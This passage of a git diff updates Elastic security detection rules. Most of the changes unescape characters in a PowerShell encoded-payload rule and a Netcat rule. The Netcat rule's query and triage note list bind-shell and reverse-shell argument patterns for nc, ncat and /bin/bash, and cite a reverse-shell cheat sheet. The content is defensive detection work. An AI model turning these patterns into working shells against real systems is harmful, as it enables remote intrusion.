authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", 
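Review bot: The last investigation step on the `+ "note"` line of the `@@ -12,7 +12,7 @@` hunk, `searching for login events (for example, 4624) to the target host after the registry modification`, refers to a registry modification that this rule does not observe — the `query` matches on `powershell.file.script_block_text`, so the trigger is a logged script block, and the phrase looks carried over from a different guide. It should read `... to the target host after the script block was logged.` or similar. The same sentence is on the `+ "note"` line of the corresponding hunk for `ad84d445-b1ce-4377-82d9-7c633f28bf9a_108.json` above, whose start is outside this view.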
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_102.json b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_102.json
index f43e08082b5..f37b61d5882 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_102.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_103.json b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_103.json
index 6f36588574a..8eaf01dc3d2 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_103.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_104.json b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_104.json
index 400154ffb78..57174d1882f 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_104.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_105.json b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_105.json
index 7fe3d5fbc2d..0e52d72cd9c 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_105.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_105.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_105.json
index effa37dcd27..00a202ffa5d 100644
--- a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_105.json
@@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "File Transfer or Listener Established via Netcat", "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. 
It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\"\u003e\",\"\u003c\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == 
\"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", "references": [ "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_106.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_106.json index f208b386b33..d9cfc361b74 100644 --- a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_106.json 
@@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "File Transfer or Listener Established via Netcat", "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. 
It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\"\u003e\",\"\u003c\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == 
\"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", "references": [ "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_107.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_107.json index 9cbe3f6425c..9e1be5db844 100644 --- a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_107.json 
@@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "File Transfer or Listener Established via Netcat", "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. 
It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\"\u003e\",\"\u003c\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == 
\"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", "references": [ "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_108.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_108.json index 0f0170ad2e4..5b8a489a53d 100644 --- a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_108.json 
@@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "File Transfer or Listener Established via Netcat", "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. 
It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\"\u003e\",\"\u003c\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == 
\"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", "references": [ "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_109.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_109.json index a7f0d77559f..acfd079ea22 100644 --- a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_109.json +++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_109.json 
@@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "File Transfer or Listener Established via Netcat", "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. 
It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\"\u003e\",\"\u003c\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == 
\"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", "references": [ "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_1.json b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_1.json index 0042b5e9675..dec413237ca 100644 --- 